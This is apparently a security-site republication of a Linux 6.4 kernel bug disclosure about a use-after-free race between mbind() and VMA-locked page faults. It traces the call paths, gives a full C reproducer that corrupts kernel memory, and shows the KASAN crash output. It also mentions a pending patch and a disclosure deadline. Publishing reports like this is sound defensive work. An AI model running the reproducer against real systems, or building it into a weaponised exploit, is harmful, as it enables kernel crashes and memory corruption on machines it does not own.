Headline

Linux 6.4 Use-After-Free / Race Condition

There is a race between mbind() and VMA-locked page faults in the Linux 6.4 kernel, leading to a use-after-free condition.

1 year ago

Packet Storm

Open in Source

#ios #google #linux #debian #git #c++#bios

Linux 6.4: UAF race between mbind() and VMA-locked page fault(tested on git master, at commit 57012c57536f)Summary:There's a race between mbind() and VMA-locked page faults, leading to UAF.You can quickly hit this with a straightforward reproducer that just keeps calling mbind() on one thread and causing page faults on another thread.I'll send a suggested patch in a minute.mbind() replaces vma->vm_policy while only protected by mmap_write_lock(), which can involve freeing the old vma->vm_policy:sys_mbind  kernel_mbind    do_mbind      mmap_write_lock      mbind_range [for each vma in range]        vma_replace_policy          new = mpol_dup(...)          old = vma->vm_policy          vma->vm_policy = new          mpol_put(old)      mmap_write_unlockVMA-locked page fault handling can allocate pages, which requires using the vma->vm_policy:do_user_addr_fault  lock_vma_under_rcu  handle_mm_fault    __handle_mm_fault      handle_pte_fault         do_pte_missing           do_anonymous_page             vma_alloc_zeroed_movable_folio               vma_alloc_folio                 get_vma_policy                   __get_vma_policy                     pol = vma->vm_policy    ***race***                     mpol_get(pol) [conditional on MPOL_F_SHARED]                 [do page allocation]                 mpol_cond_put(pol)  vma_end_readBecause of the mpol_cond_put(pol) call, it should be possible for this to manifest as a UAF write.You can hit this race on a kernel with CONFIG_NUMA and CONFIG_KASAN very quickly (less than a second, I think) with this reproducer - you don't need an actual NUMA system for this, I've tested it in a QEMU VM without NUMA:==============// gcc -pthread -o mbind-vs-pf mbind-vs-pf.c -Wall#define _GNU_SOURCE#include <pthread.h>#include <err.h>#include <unistd.h>#include <sys/syscall.h>#include <sys/mman.h>#include <linux/mempolicy.h>#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1L) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})static char *vma;static void *fault_thread(void *arg) {  while (1) {    // fault in...    *vma = 1;    // ... and zero the PTE again with zap_page_range_single()    SYSCHK(madvise(vma, 0x1000, MADV_DONTNEED));  }}static void mbind_vma(unsigned long policy) {  unsigned long nmask = (1UL << 0);  SYSCHK(syscall(__NR_mbind, vma, 0x1000, policy|0, &nmask, sizeof(nmask)*8+1, 0));}int main(void) {  vma = SYSCHK(mmap((void*)0x100000, 0x1000,        PROT_READ|PROT_WRITE|PROT_EXEC,        MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));  pthread_t thread;  if (pthread_create(&thread, NULL, fault_thread, NULL))    errx(1, \"pthread_create\");  while (1) {    mbind_vma(MPOL_BIND);    mbind_vma(MPOL_INTERLEAVE);  }}==============This will give the following splat:==================================================================BUG: KASAN: slab-use-after-free in vma_alloc_folio+0x93/0x220Read of size 2 at addr ffff888007c0e6f6 by task mbind-vs-pf/556CPU: 3 PID: 556 Comm: mbind-vs-pf Not tainted 6.5.0-rc3-00123-g57012c57536f #304Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014Call Trace: <TASK> dump_stack_lvl+0x36/0x50 print_report+0xcf/0x660[...] kasan_report+0xc7/0x100[...] vma_alloc_folio+0x93/0x220 __handle_mm_fault+0x71b/0x1060[...] handle_mm_fault+0xbe/0x280 do_user_addr_fault+0x196/0x630 exc_page_fault+0x5c/0xc0 asm_exc_page_fault+0x26/0x30[...] </TASK>Allocated by task 555: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 __kasan_slab_alloc+0x6e/0x70 kmem_cache_alloc+0xf5/0x260 __mpol_dup+0x72/0x1c0 vma_replace_policy+0x20/0xb0 do_mbind+0x379/0x510 kernel_mbind+0x11a/0x130 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x6e/0xd8Freed by task 555: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 kasan_save_free_info+0x2b/0x50 __kasan_slab_free+0x10a/0x180 kmem_cache_free+0xaa/0x380 vma_replace_policy+0x87/0xb0 do_mbind+0x379/0x510 kernel_mbind+0x11a/0x130 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x6e/0xd8[...]==================================================================If I leave the reproducer running some more, I get other crashes, like in the KASAN internals, that suggest that the reproducer is already causing memory corruption.In case you're curious: I found this by grepping for mmap_write_lock*() calls and looking at most of them to figure out if they do anything interesting to VMAs without taking VMA locks.This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-10-26.Found by: [email protected]

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution

7 months ago

Packet Storm

Fortinet FortiManager Unauthenticated Remote Code Execution

7 months ago

Packet Storm

Asterisk AMI Originate Authenticated Remote Code Execution

7 months ago

Packet Storm

Debian Security Advisory 5823-1

7 months ago

Packet Storm

Debian Security Advisory 5815-2

7 months ago

Packet Storm